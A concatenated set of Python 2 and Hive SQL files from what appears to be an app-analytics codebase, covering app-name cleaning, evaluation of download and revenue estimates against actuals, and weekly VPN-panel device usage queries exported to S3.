self.app_clean_suffix_last_word_RE = re.compile(r'(\bfor\b|\bfull\b)$', flags=re.I)
self.app_illegal_chars_RE = re.compile(r'(^\w|\:|\+|\-|\!|\.|&|,|_])')
self.english_words_RE = re.compile(r'[^\x00-\x7f]')
self.app_clean_prefix_RE = re.compile('^(' + '|'.join([r'\b%s\b' % c for c in self.prefix_words]) + ')', re.I)
self.app_clean_content_trademark_RE = re.compile(r'[\xc2\xa9|\xe2\x84\xa2|\xc2\xae]+')
def clean_app_name(self, app_name):
"""
Clean app name.
Return cleaned app name.
"""
try:
app_name = app_name.encode('utf-8')
except:
pass
        app_name = self.replace_app_special_chinese_character(app_name)
app_name = self.app_clean_content_trademark_RE.sub(' ', app_name)
if not self.is_english(app_name):
return None
org_appname = app_name
if app_name:
app_name = self.clean_app_illegal_chars(app_name)
if app_name:
app_name = self.clean_app_prefix_words(app_name)
if app_name:
app_name = self.clean_app_content_words(app_name)
if app_name:
app_name = self.clean_app_suffix_words(app_name)
if app_name:
app_name = self.clean_app_name_space(app_name)
if app_name and len(app_name) > 1:
return app_name
return org_appname
    def replace_app_special_chinese_character(self, app_name):
        """
        Replace special punctuation (en dash, curly quote, CJK brackets) with ASCII equivalents.
        Return cleaned app name.
        """
index = app_name.find("–")
if index > -1:
regex = re.compile(ur"[\u2013]")
app_name = regex.sub('-', app_name.decode('utf-8')).encode('utf-8')
index = app_name.find("’")
if index > -1:
regex = re.compile(ur"[\u2019]")
app_name = regex.sub('\'', app_name.decode('utf-8')).encode('utf-8')
index = app_name.find("【")
if index > -1:
regex = re.compile(ur"[\u3010]")
app_name = regex.sub('[', app_name.decode('utf-8')).encode('utf-8')
index = app_name.find("】")
if index > -1:
regex = re.compile(ur"[\u3011]")
app_name = regex.sub(']', app_name.decode('utf-8')).encode('utf-8')
return app_name
def clean_app_illegal_chars(self, app_name):
"""
Clean app illegal chars.
Return cleaned app name.
"""
return self.clean_app_name_space(self.app_illegal_chars_RE.sub(' ', app_name))
def clean_app_prefix_words(self, app_name):
"""
Clean app name prefix words.
Return cleaned app name.
"""
return self.clean_app_name_space(self.app_clean_prefix_RE.sub(' ', app_name))
def clean_app_content_words(self, app_name):
"""
Clean app name content words.
Return cleaned app name.
"""
app_name = self.app_clean_content_dash_RE.sub(' ', app_name)
app_name = self.app_clean_content_brackets_RE.sub(' ', app_name)
app_name = self.app_clean_content_filter_RE.sub(' ', app_name)
return self.clean_app_name_space(app_name)
def clean_app_suffix_words(self, app_name):
"""
Clean app name suffix words.
Return cleaned app name.
"""
app_name = self.app_clean_suffix_last_char_RE.sub(' ', app_name)
app_name = self.app_clean_suffix_last_word_RE.sub(' ', app_name)
return self.clean_app_name_space(app_name)
def clean_app_name_space(self, app_name):
"""
Clean app name space.
Return cleaned app name.
"""
app_name = ' '.join(app_name.split())
app_name = app_name.strip()
return app_name
def is_english(self, s):
"""
Check if the string is English.
Return true|false.
"""
return not re.search(self.english_words_RE, s)<file_sep>/evaluation/py/get_estimate_info.py
# Author: <NAME> <<EMAIL>>
import os
import sys
import pandas as pd
import numpy as np
from joblib import Parallel, delayed
# This step is time-consuming and we parallelize
def main():
input_dir = sys.argv[1]
output_dir = sys.argv[2]
Parallel(n_jobs=4)(delayed(_run)(f, input_dir, output_dir)
for f in filter(lambda s: s.endswith('.csv'), os.listdir(input_dir)))
def _run(f, input_dir, output_dir):
full_path = os.path.join(input_dir, f)
df = pd.read_csv(full_path)
apps_median_rank = _get_median_rank(df)
estimate_sd = _get_estimate_sd(df)
merged_info = apps_median_rank.merge(estimate_sd, how='outer', on=['app_id'])
merged_info.to_csv(os.path.join(output_dir, f), index=False)
# apps_median.to_csv(os.path.join(output_dir, f), index=False)
def _get_median_rank(df):
grouped = df.groupby(['app_id', 'category_id', 'feed_id'])['rank'].median()
agg = grouped.reset_index()
agg['median_rank'] = map(str, agg['rank'])
agg = agg.drop(['category_id', 'feed_id'], axis=1)
median_ranks = agg.groupby('app_id').aggregate({'median_rank': lambda x: ','.join(x)})
return median_ranks.reset_index()
def _get_estimate_sd(df):
def calculate_sd(x):
# Filter values == 1
if x.shape[0] == 1:
return np.nan
else:
return x.std()
df = df.drop(['rank', 'feed_id'], axis=1)
# Sum different feeds for each (app_id, date, category) combination
df_feeds_caggregated = df.groupby(['app_id', 'date', 'category_id']).sum()
std_within_categories = df_feeds_caggregated.groupby(level=['app_id', 'date']).aggregate(calculate_sd)
std_info = std_within_categories.groupby(level='app_id').aggregate(pd.Series.mean)
std_info.rename(columns={"('app_id', '')": "app_id"}, inplace=True)
return std_info.reset_index().rename(columns={'estimate': 'estimate_sd_mean'})
#print(grouped.std(level=['app_id', 'date']).groupby(level='app_id').aggregate().head())
# std = grouped.reset_index().drop('category_id', axis=1).groupby(['app_id', 'date']).std().reset_index()
# estimate_sd = std.groupby('app_id').aggregate([pd.Series.mean, pd.Series.median])
# estimate_sd
#print(grouped.reset_index(level=2).std().reset_index())
if __name__ == '__main__':
main()
<file_sep>/aa_au_model/hive_ql/sample_week_overview.sql
set hive.auto.convert.join = true;
set hive.exec.dynamic.partition = true;
set start_date = '2015-08-30';
set end_date = '2015-09-05';
-- Get all devices connected to VPN for the selected week
drop table if exists connected_devices;
create table connected_devices
as
select
distinct device_id
from
vpn_sample_data_connection_session_us
where
datestr between ${hiveconf:start_date} and ${hiveconf:end_date}
;
-- Select iPhone and iPad devices for bundle_id
drop table if exists ios_devices_types;
create table ios_devices_types
as
select
distinct device_id
from
vpn_new_device_info_us
where
platform = 'iOS'
and type in ('Smartphone','Tablet')
and sdkbundleid = 'com.vpndefender.VPNDefender'
;
-- Select number of iPhones and iPads connected in the selected week
drop table if exists connected_devices_ios;
create table connected_devices_ios
as
select
ios.device_id
from
ios_devices_types ios
join connected_devices connected
on ios.device_id = connected.device_id
;
-- Select weekly active devices
drop table if exists period_active_weekly_us;
create table period_active_weekly_us
as
select
x.datestr,
x.device_id
from (
select
active.datestr,
active.device_id,
cast(count(distinct(active.date)) as int) as n_active
from
usage_model_selected_device_timezone_weekly active
group by
active.datestr,
active.device_id
having
cast(count(distinct(active.date)) as int) = 7
) x
;
-- Get first and last active week for connected iPhones and iPads
drop table if exists active_devices_ios;
create table active_devices_ios
as
select
active.device_id,
min(datestr) as first_active_week,
max(datestr) as last_active_week
from
connected_devices_ios connected
join period_active_weekly_us active
on connected.device_id = active.device_id
group by
active.device_id
;
-- Get the new sample units for the selected week
-- Load in Python to get demographic composition
drop table if exists new_active_ios_types_export;
create table new_active_ios_types_export (
device_id string)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/new_active'
;
insert overwrite table new_active_ios_types_export
select
device_id
from
active_devices_ios
where
first_active_week = ${hiveconf:end_date}
;
-- Get week overview
select
all_active.count,
connected.count,
new_active.count
from (
select
count(*) as count
from
active_devices_ios
where
last_active_week = ${hiveconf:end_date}
) all_active
JOIN
(
select
count(*) as count
from
connected_devices_ios
) connected
JOIN
(
select
count(*) as count
from
active_devices_ios
where
first_active_week = ${hiveconf:end_date}
) new_active
;
<file_sep>/user_profile/hive_ql/export_time_series.sql
set hive.auto.convert.join = true;
set hive.exec.dynamic.partition = true;
set start_date = '2015-04-01';
set end_date = '2015-04-30';
-- Get unique iOS devices
drop table if exists ios_devices_types;
create table ios_devices_types
as
select
device_id,
type
from
vpn_new_device_info
where
platform = 'iOS'
and type in ('Smartphone', 'Tablet')
group by
device_id,
type
;
-- get category per bundle_id
drop table if exists category;
create table category
as
select
distinct bundle_id,
app_category as category
from
vpn_sample_dpi_apps
;
-- get usage for selected time frame
drop table if exists daily_data;
create table daily_data
as
select
x.device_id,
x.bundle_id,
x.category,
x.device_type,
if(isnull(x.sign),
hour(from_unixtime(x.int_time)),
if(x.sign = "+",
hour(from_unixtime(x.int_time + x.value_int * 3600 + x.value_extra_int * 60)),
hour(from_unixtime(x.int_time - x.value_int * 3600 - x.value_extra_int * 60)))) as hour,
if(isnull(x.sign),
from_unixtime(x.int_time,'u'),
if(x.sign = "+",
from_unixtime(x.int_time + x.value_int * 3600 + x.value_extra_int * 60,'u'),
from_unixtime(x.int_time - x.value_int * 3600 - x.value_extra_int * 60,'u'))) as day
from (
select
usage.device_id,
usage.bundleid as bundle_id,
cat.category,
ios.type as device_type,
offset,
cast(starttime/1000 as bigint) as int_time,
if(offset != 'Unknown', substr(offset,1,1), NULL) as sign,
if(offset != 'Unknown', floor(cast(substr(offset,2) as int)/100.0), NULL) as value_int,
if(offset != 'Unknown', pmod(cast(substr(offset,2) as int),100), NULL) as value_extra_int
from
vpn_sample_data_session usage
join ios_devices_types ios
on ios.device_id = usage.device_id
join category cat
on cat.bundle_id = usage.bundleid
where
usage.country = 'US'
and usage.datestr between ${hiveconf:start_date} and ${hiveconf:end_date}
) x
;
-- Export daily data
drop table if exists daily_data_export;
create table daily_data_export (
bundle_id string,
category string,
device_type string,
hour int,
freq int,
day int)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/daily_data'
;
insert overwrite table daily_data_export
select
bundle_id,
category,
device_type,
hour,
count(*) as freq,
day
from
daily_data
group by
bundle_id,
category,
device_type,
hour,
day
;
<file_sep>/ranking_change/downloads_revenue_consistency.py
'''
Created on Sep 13, 2013
@author: perezrafael
'''
import pandas as pd
import config
import operator
import scipy
import numpy as np
from numpy.linalg import norm
from scipy import spatial
from sklearn import cluster
import csv
import matplotlib.pyplot as plt
metadata_f = '/Users/perezrafael/appannie/data/final_9_4/debug_file_20130904.csv'
#metadata_f = '/Users/perezrafael/appannie/data/2013-09-10_US_UK_JP_CN/debug_file_143441_6014+rsd+zvalue.csv'
feed_type_format = {'IPHONE_FREE': 'Free',
'IPHONE_PAID': 'Paid',
'IPHONE_GROSSING': 'Grossing',
'IPAD_FREE': 'Free',
'IPAD_PAID': 'Paid',
'IPAD_GROSSING': 'Grossing',
}
feed_market_format = {'IPHONE_FREE': 'iPhone',
'IPHONE_PAID': 'iPhone',
'IPHONE_GROSSING': 'iPhone',
'IPAD_FREE': 'iPad',
'IPAD_PAID': 'iPad',
'IPAD_GROSSING': 'iPad',
}
def plot_actuals(df):
    ########### Plot actuals vs estimates ################
for n,g in df.groupby(['Country', 'Category', 'Type', 'Date']):
fig = plt.figure()
ax = fig.add_subplot(111)
p1, = ax.plot(g['Actual'], g['Actual'], 'r-', label='Actuals')
p2, = ax.plot(g['Actual'], g['Estimate'], 'b.', alpha=0.4, label='Original SBE')
p3, = ax.plot(g['Actual'], g['Estimate_based_on_downloads'], 'g.', alpha=0.4, label='Estimate based on downloads')
p4, = ax.plot(g['Actual'], g['Estimate_based_on_revenue'], 'm.', alpha=0.4, label='Estimtate based on revenue')
ax.legend(loc='best')
title = 'difference_%s'%str(n)
plt.title(title)
plt.xlabel('Actuals')
plt.ylabel('Estimates')
ax.set_yscale('log')
ax.set_xscale('log')
plt.grid()
fig.savefig('plots/revenue_downloads_consistency/%s.png'%title)
def plot_80_20(df):
########### Plot 80-20 curves ################
for n,g in df.groupby(['Country','Category', 'Type', 'Date']):
fig = plt.figure()
g = g.sort('Actual', ascending=False)
g = g[:200]
ax = fig.add_subplot(111)
g = g.sort('orig_rel_error', ascending=True)
p1, = ax.plot(g['orig_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'b-', alpha=0.4, label='Original SBE')
g = g.sort('based_on_downloads_rel_error', ascending=True)
p2, = ax.plot(g['based_on_downloads_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'g-', alpha=0.4, label='Estimate based on downloads')
g = g.sort('based_on_revenue_rel_error', ascending=True)
p3, = ax.plot(g['based_on_revenue_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'm-', alpha=0.4, label='Estimate based on revenue')
ax.legend(loc='best')
title = '80-20_%s'%str(n)
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('%')
plt.xlabel('Relative Error')
plt.grid()
fig.savefig('plots/revenue_downloads_consistency/%s.png'%title)
#### Data cleaning ######
def preprocess_metadata(df):
df['SS Country'] = df['APP Country'].apply(lambda x: config.IOS_STORES_DICT[x])
del df['APP Country']
df['SS Category'] = df['SS-APP Category-S'].apply(lambda x:config.IOS_CATEGORIES_DICT[x])
df['SS Type'] = df['SS-APP Feed-S'].apply(lambda x: feed_type_format[x])
df['SS Market'] = df['SS-APP Feed-S'].apply(lambda x: feed_market_format[x])
del df['SS-APP Feed-S']
df = df[df['SS-APP Universal-S']==False]
df = df.fillna(0.0)
df.rename(columns={'DATE-Day': 'SS Date',
'AN-APP Actual-S': 'SS AN-APP Actual-S',
'INT-APP Estimate Weighted SBE-S': 'SS-APP Estimate Weighted SBE-S',
'AN-APP Actual Adj-C': 'SS Adjusted Actual'},
inplace=True)
matching = [s for s in df.columns if 'SS' in s]
df = df[matching]
df.rename(columns={'SS Country': 'Country',
'SS Category': 'Category',
'SS Type': 'Type',
'SS Market': 'Market',
'SS Date': 'Date',
'SS-Business Model-C': 'business_model',
'SS-APP ID-S': 'App ID',
'SS-APP Rank-S': 'Rank',
'SS-APP Estimate Weighted SBE-S': 'Estimate',
'SS Adjusted Actual': 'Adjusted Actual'},
inplace=True)
return df
def main():
df = preprocess_metadata(pd.read_csv(metadata_f))
df = df[(df['Date']=='2013-08-03') | (df['Date']=='2013-08-17')]
df = df[df['business_model']=='Pure Paid']
df = df[df['Type']!='Free']
df = df[['Country', 'Category', 'Type', 'Date', 'App ID', 'Adjusted Actual', 'Estimate', 'SS-APP Price-S']]
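# For pure paid apps revenue = downloads * price, so each feed's estimate implies a cross-check estimate for the other metric.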
df['downloads_based_on_revenue'] = df['Estimate'] / df['SS-APP Price-S']
df['revenue_based_on_downloads'] = df['Estimate'] * df['SS-APP Price-S']
df['Estimate_based_on_revenue'] = 0.0
#df['Estimate_based_on_revenue'][df['Type']=='Paid'] = (df['Estimate'][df['Type']=='Paid'] + df['downloads_based_on_revenue'][df['Type']=='Paid'])/2.0
df['Estimate_based_on_revenue'][df['Type']=='Paid'] = df['downloads_based_on_revenue'][df['Type']=='Paid']
df['Estimate_based_on_revenue'][df['Type']=='Grossing'] = df['Estimate'][df['Type']=='Grossing']
df['Estimate_based_on_downloads'] = 0.0
#df['Estimate_based_on_downloads'][df['Type']=='Grossing'] = (df['Estimate'][df['Type']=='Grossing'] + df['downloads_based_on_revenue'][df['Type']=='Grossing'])/2.0
df['Estimate_based_on_downloads'][df['Type']=='Grossing'] = df['downloads_based_on_revenue'][df['Type']=='Grossing']
df['Estimate_based_on_downloads'][df['Type']=='Paid'] = df['Estimate'][df['Type']=='Paid']
print df
df = df.groupby(['Country', 'Category', 'Type', 'App ID', 'Date']).sum().reset_index()
df['orig_rel_error'] = (df['Estimate'] - df['Adjusted Actual']).abs()/df['Adjusted Actual']
df['based_on_downloads_rel_error'] = (df['Estimate_based_on_downloads'] - df['Adjusted Actual']).abs()/df['Adjusted Actual']
df['based_on_revenue_rel_error'] = (df['Estimate_based_on_revenue'] - df['Adjusted Actual']).abs()/df['Adjusted Actual']
print df
df['Actual'] = df['Adjusted Actual']
plot_actuals(df)
plot_80_20(df)
if __name__ == '__main__':
main()<file_sep>/google-analytics/constant/__init__.py
## This is Google Analytics Benchmarking Version v1.0
# This folder contains the constants and lookup tables.
<file_sep>/universals/test.py
'''
Created on Mar 29, 2013
@author: perezrafael
'''
import pandas as pd
import numpy as np
import matplotlib
#matplotlib.use('Agg')
import matplotlib.pyplot as plt
import os.path
import sklearn
def reformat_types(df):
for column in df.columns:
if type(df[column][0]) is str:
new_column = df[[column]].drop_duplicates().reset_index()[[column]]
new_column = new_column.reset_index()
if column != 'index':
new_column.rename(columns={'index' : 'level_0'}, inplace=True)
df = df.merge(new_column, on=column)
df = df.drop(column, axis=1)
df.rename(columns={'level_0' : column}, inplace=True)
return df
def _listdir_with_fullpath(d):
return [os.path.join(d, i) for i in os.listdir(d)]
if __name__ == '__main__':
COUNTRY = 143441
input_dirs = _listdir_with_fullpath('/Users/perezrafael/appannie/data_science/evaluation/data/ios/2013-02/estreal_daily_raw')
dfs = map(pd.read_csv, input_dirs)
df = pd.concat(dfs)
df = df[(df['feed_id']==0) | (df['feed_id']==101)]
df = reformat_types(df)
gdf = df.groupby(['category_id', 'date', 'app_id'])
gdf = gdf.size().reset_index()
gdf.rename(columns={0:'count'}, inplace=True)
universals = gdf[gdf['count']>1][['app_id']].drop_duplicates()
universals['universal'] = 1
gdf = gdf.merge(universals, on='app_id', how='inner')
gdf['ratio'] = -1
gdf['ratio'][(gdf['universal']==1) & (gdf['count']==1)] = 1
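# ratio: 1 = universal app charting in only one feed that day; -1 = charting in both feeds, to be replaced later by the estimate-based split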
universals = df.merge(gdf, on=['category_id', 'app_id', 'date'], how='inner')
universals = universals.sort('units', ascending=False)
#universals = universals[:100000]
concatenated = pd.DataFrame()
ugdf = universals[['category_id', 'rank', 'app_id', 'estimate', 'feed_id', 'units', 'date', 'ratio']].groupby('feed_id')
first_pass = True
prev_name = ''
units_first_name = ''
for name, group in ugdf:
if first_pass:
concatenated = group
first_pass=False
units_first_name = 'units_%s'%name
else:
concatenated = concatenated.merge(group, on=['category_id', 'app_id', 'date'], how='outer', suffixes=['_%s'%prev_name, '_%s'%name])
concatenated['ratio_%s'%name][np.isnan(concatenated['ratio_%s'%name])] = 0
concatenated['ratio_%s'%prev_name][np.isnan(concatenated['ratio_%s'%prev_name])] = 0
#concatenated['ratio_%s'%name][concatenated['ratio_%s'%name]<0] = concatenated['estimate_%s'%name]/(concatenated['estimate_%s'%name] + concatenated['estimate_%s'%prev_name])
#concatenated['ratio_%s'%prev_name][concatenated['ratio_%s'%prev_name]<0] = concatenated['estimate_%s'%prev_name]/(concatenated['estimate_%s'%name] + concatenated['estimate_%s'%prev_name])
concatenated['ratio_%s'%name][concatenated['ratio_%s'%name]<0] = concatenated['estimate_%s'%name]/concatenated[units_first_name]
concatenated['ratio_%s'%prev_name][concatenated['ratio_%s'%prev_name]<0] = concatenated['estimate_%s'%prev_name]/concatenated[units_first_name]
concatenated['ratio_%s'%name][concatenated['ratio_%s'%name]>1] = 1
concatenated['ratio_%s'%prev_name][concatenated['ratio_%s'%prev_name]>1] = 1
concatenated[units_first_name][np.isnan(concatenated[units_first_name])]=concatenated['units_%s'%name][np.isnan(concatenated[units_first_name])]
concatenated = concatenated.drop('units_%s'%name, axis=1)
prev_name = name
concatenated['sbe'] = concatenated['estimate_0'].fillna(0) + concatenated['estimate_101'].fillna(0)
concatenated['rel_diff'] = ((concatenated['units_0'] - concatenated['sbe']) / concatenated['units_0']).abs()
concatenated = concatenated[concatenated['rel_diff']<0.01]
#concatenated['store_id'] = COUNTRY
concatenated.to_csv('/Users/perezrafael/appannie/data/%s_universal_test.csv'%COUNTRY, index=False)
universals = universals.drop(['universal', 'estimate'], axis=1)
gdf = universals.groupby(['app_id', 'category_id'])
plotting = False
for name, group in gdf:
title_str = '%s_%s'%name
single_feed = group[group['ratio']>0]
single_feed_size = single_feed.shape[0]
dual_feed_size = group[group['ratio']<0].shape[0]
if single_feed_size>0 and dual_feed_size>0 and plotting:
plt.clf()
#ax = plt.subplot(111)
plt.plot(group[group['feed_id']==0]['rank'], group[group['feed_id']==0]['units'], 'b^', alpha=0.9)
plt.plot(group[group['feed_id']==101]['rank'], group[group['feed_id']==101]['units'], 'bs', alpha=0.9)
plt.plot(single_feed[single_feed['feed_id']==0]['rank'], single_feed[single_feed['feed_id']==0]['units'], 'r^', alpha=0.9)
plt.plot(single_feed[single_feed['feed_id']==101]['rank'], single_feed[single_feed['feed_id']==101]['units'], 'rs', alpha=0.9)
#plt.plot(group['date'].median(), group['units'].median(), 'b^', ms=20)
#plt.plot(group['date'].median(), single_feed['units'].median(), 'r^', ms=20)
plt.title(title_str)
#ax.set_xscale('log')
#ax.set_yscale('log')
plt.show()
<file_sep>/ranking_change/find_scales.py
'''
Created on Aug 22, 2013
@author: perezrafael
'''
import pandas as pd
import scipy
import scipy.optimize as opt
import sklearn
import config
import csv
import matplotlib.pyplot as plt
import operator
import numpy as np
import os
from matplotlib import cm
from sklearn import cluster
###### Input right now is debug files ######
metadata_f = '/Users/perezrafael/appannie/data/debug_file_20130830.csv'
data_dir = '/Users/perezrafael/appannie/data/2_countries_7_categories_from_20130801_to_20130819_P5'
SUBSCRIPTION_T = 0.5
##### scaling function ######
def scale(x, a):
return a * x
def power_law(x, a, b):
return a * (x ** b)
feed_type_format = {'IPHONE_FREE': 'Free',
'IPHONE_PAID': 'Paid',
'IPHONE_GROSSING': 'Grossing',
'IPAD_FREE': 'Free',
'IPAD_PAID': 'Paid',
'IPAD_GROSSING': 'Grossing',
}
feed_market_format = {'IPHONE_FREE': 'iPhone',
'IPHONE_PAID': 'iPhone',
'IPHONE_GROSSING': 'iPhone',
'IPAD_FREE': 'iPad',
'IPAD_PAID': 'iPad',
'IPAD_GROSSING': 'iPad',
}
###### Get business model ########
min_IAP_from_subs = 0.0
grossing_business_models = {
'Pure Free': [operator.eq, 0.0, False, operator.eq, 0.0],
'Pure Paid': [operator.gt, 0.0, False, operator.eq, 0.0],
'Freemium': [operator.eq, 0.0, True, operator.le, min_IAP_from_subs],
'Paymium': [operator.gt, 0.0, True, operator.le, min_IAP_from_subs],
'Freemium + Subs': [operator.eq, 0.0, True, operator.gt, min_IAP_from_subs],
'Paymium + Subs': [operator.gt, 0.0, True, operator.gt, min_IAP_from_subs]
}
#### Data cleaning ######
def preprocess_metadata(df):
df = df[df['AVG']=='F']
del df['AVG']
del df['Start Date']
del df['End Date']
#del df['Rank Link']
del df['Customize']
del df['Included']
df['Country'] = df['Store'].apply(lambda x: config.IOS_STORES_DICT[x])
del df['Store']
df['Category'] = df['Category'].apply(lambda x:config.IOS_CATEGORIES_DICT[x])
df['Main Category'] = df['Main Category'].apply(lambda x:config.IOS_CATEGORIES_DICT[x])
df['Type'] = df['Feed'].apply(lambda x: feed_type_format[x])
df['Market'] = df['Feed'].apply(lambda x: feed_market_format[x])
del df['Feed']
df.rename(columns={'Day':'Date'}, inplace=True)
df['z_value'][df['z_value']=='n/a'] = None
df['z_value'] = df['z_value'].astype(float)
df = df.fillna(0.0)
#df['% IAP revenues coming from subscription'] = df['% IAP revenues coming from subscription'].fillna(0.0)
#df['App Price'] = df['App Price'].fillna(0.0)
df['business_model'] = None
for k,v in grossing_business_models.iteritems():
df['business_model'][(v[0](df['App Price'], v[1])) & (df['Has IAP']==v[2]) & (v[3](df['% IAP revenues coming from subscription'], v[4]))] = k
#df['business_model'][(df['business_model']=='Pure Free') & (df['Total App Download Revenues']>0) & (df['Total IAP Download Units']==0)] = 'Pure Paid'
#df['business_model'][(df['business_model']=='Pure Free') & (df['Total App Download Revenues']==0) & (df['Total IAP Download Units']>0)] = 'Freemium'
#df['business_model'][(df['business_model']=='Pure Free') & (df['Total App Download Revenues']>0) & (df['Total IAP Download Units']>0)] = 'Paymium'
#df['business_model'][(df['business_model']=='Freemium') & (df['z_value']<0.7)] = 'Freemium_1'
#df['business_model'][(df['business_model']=='Freemium') & (df['z_value']>=0.7)] = 'Freemium_2'
#df['business_model'][df['business_model']=='Paymium + Subs'] = 'Combined Paymium'
#df['business_model'][df['business_model']=='Paymium'] = 'Combined Paymium'
#df['business_model'][df['business_model']=='Freemium + Subs'] = 'Combined Paymium'
df['rank_range'] = 0
df['rank_range'][df['Rank']<21] = 20
for rank in range(50,1600)[0::50]:
df['rank_range'][(df['Rank']<rank) & (df['rank_range']==0)] = rank
df = df.fillna(0.0)
#df = df.dropna()
return df
def analyze_z_value(df):
df = df[df['business_model']=='Freemium']
df['log_rank'] = np.log(df['Rank'])
df['log_adjusted_actual'] = np.log(df['Adjusted Actual'])
#df['z_value'][df['z_value']>df['z_value'].quantile(0.90)] = df['z_value'].quantile(0.90)
#df['z_value'][df['z_value']<df['z_value'].quantile(0.1)] = df['z_value'].quantile(0.1)
#df['z_norm'] = (df['z_value'] - df['z_value'].min()) / (df['z_value'].max() - df['z_value'].min())
#plt.scatter(np.log(df['Rank'][df['Category']=='Overall']), np.log(df['Adjusted Actual'][df['Category']=='Overall']), c=df['z_norm'][df['Category']=='Overall'], marker='o', cmap=cm.RdYlBu, alpha=0.4)
#plt.scatter(np.log(df['Rank'][df['Category']=='Games']), np.log(df['Adjusted Actual'][df['Category']=='Games']), c=df['z_norm'][df['Category']=='Games'], marker='^', cmap=cm.RdYlBu, alpha=0.4)
#plt.scatter(np.log(df['Rank'][df['Category']=='Casino']), np.log(df['Adjusted Actual'][df['Category']=='Casino']), c=df['z_norm'][df['Category']=='Casino'], marker='s', cmap=cm.RdYlBu, alpha=0.4)
#plt.show()
model = cluster.KMeans(n_clusters=3)
model.fit(df[['z_value']])
df['cluster_labels'] = model.labels_
for n,g in df.groupby('cluster_labels'):
print n
print g['z_value'].describe()
def get_scales(df, start, end):
df['scale'] = 1.0
results = []
###### Each scale is generated by Country, Category, Market, Type, Business Model and Rank range
for n, g in df.groupby(['Country', 'Category', 'Market', 'Type', 'business_model', 'rank_range']):
##### Filter only dates for scale generation
g3 = g[(g['Date']>=start) & (g['Date']<=end)]
##### Sort by error, drop top 10% #######
g3 = g3.sort('adjusted_rel_error', ascending=False)
remove = int(g3.shape[0]*0.1)
g3 = g3[remove:]
g3 = g3[['Daily Estimate', 'Adjusted Actual', 'Country', 'Category', 'Market', 'Type', 'App ID']].drop_duplicates()
##### Generate the scales based on testing data, if the scale can't be generated we assign it 1
try:
res = opt.curve_fit(scale, g3['Daily Estimate'].values, g3['Adjusted Actual'].values)
except:
res = [[None,0]]
g['scaling_count'] = g3.shape[0]
g['scale'] = res[0][0]
results.append(g)
print n
print res
results = pd.concat(results)
###### If the scale is greater than 2.0, assign 2.0 #######
#results['scale'][results['scale']>2.0] = 2.0
###### If the scale is smaller than 0.5, assign 0.5 #######
#results['scale'][results['scale']<0.5] = 0.5
#r2 = []
#for n, g in results[['Country', 'Category', 'Market', 'Type', 'business_model', 'scale', 'rank_range']].groupby(['Country', 'Category', 'Market', 'Type', 'business_model']):
# g = g.drop_duplicates()
# mean_scale = g['scale'].mean()
# g = g.sort('rank_range', ascending=True)
# g['scale'] = g['scale'].interpolate(method='linear')
# g['scale'] = g['scale'].fillna(mean_scale)
# r2.append(g)
#r2 = pd.concat(r2)
#del results['scale']
#results = results.merge(r2, on=['Country', 'Category', 'Market', 'Type', 'business_model', 'rank_range'])
results['Scaled Estimate'] = results['Daily Estimate'] * results['scale']
results = results.sort(['Country', 'Category', 'Date', 'Actual'], ascending=False)
results.to_csv('data/scales/%s_raw.csv'%end, index=False, quoting = csv.QUOTE_NONNUMERIC)
return results
def plot_actuals(df):
########### Plot actuals vs. estimates ################
for n,g in df.groupby(['Country', 'Category', 'Type']):
fig = plt.figure()
ax = fig.add_subplot(111)
p1, = ax.plot(g['Actual'], g['Actual'], 'r-', label='Actuals')
p2, = ax.plot(g['Actual'], g['Daily Estimate'], 'b.', alpha=0.4, label='Original SBE')
p3, = ax.plot(g['Actual'], g['Scaled Estimate'], 'g.', alpha=0.4, label='Scaled SBE')
ax.legend(loc='best')
title = 'difference_%s'%str(n)
plt.title(title)
plt.xlabel('Actuals')
plt.ylabel('Estimates')
ax.set_yscale('log')
ax.set_xscale('log')
plt.grid()
fig.savefig('plots/scales/%s.png'%title)
def plot_80_20(df):
########### Plot 80-20 curves ################
for n,g in df.groupby(['Country','Category', 'Type']):
fig = plt.figure()
g = g.sort('Actual', ascending=False)
g = g[:200]
ax = fig.add_subplot(111)
g = g.sort('orig_rel_error', ascending=True)
p1, = ax.plot(g['orig_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'b-', label='Original SBE')
g = g.sort('scaled_rel_error', ascending=True)
p2, = ax.plot(g['scaled_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'g-', label='Scaled SBE')
ax.legend(loc='best')
title = '80-20_%s'%str(n)
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('%')
plt.xlabel('Relative Error')
plt.grid()
fig.savefig('plots/scales/%s.png'%title)
def main():
if metadata_f is None:
df = []
for (dirpath, dirnames, filenames) in os.walk(data_dir):
for filename in filenames:
if filename.endswith('.csv'):
sdf = pd.read_csv(os.sep.join([dirpath, filename]))
sdf = preprocess_metadata(sdf)
df.append(sdf)
df = pd.concat(df)
else:
df = preprocess_metadata(pd.read_csv(metadata_f))
###### We only want grossing for now ######
df = df.dropna()
df = df[df['Type']=='Grossing']
df = df[df['Date']>='2013-08-01']
#df = df[df['Rank']<=200]
#df = df[df['Category']=='Overall']
df = df[df['Country']=='United States']
df['adjusted_error'] = (df['Daily Estimate'] - df['Adjusted Actual']).abs()
df['adjusted_rel_error'] = df['adjusted_error']*1.0/df['Adjusted Actual']
start = '2013-08-18'
end = '2013-08-24'
df = get_scales(df, start, end)
df[['Country', 'Category', 'Market', 'Type', 'rank_range', 'business_model', 'scale', 'scaling_count']].drop_duplicates().to_csv('data/scales/scales.csv' ,index=False, quoting = csv.QUOTE_NONNUMERIC)
######### Everything below this line is for plotting and presenting results ##############
df = df[df['Date']>='2013-08-09']
summed = df.groupby(['Country', 'Category', 'Type', 'App ID', 'App Name', 'Publisher ID', 'Publisher Name', 'business_model', 'IS Universal']).sum().reset_index()
#summed = results.groupby(['Country', 'Category', 'Type', 'App ID', 'App Name', 'Date', 'Publisher ID', 'Publisher Name', 'business_model', 'IS Universal']).mean().reset_index()
summed['Actual'] = summed['Adjusted Actual']
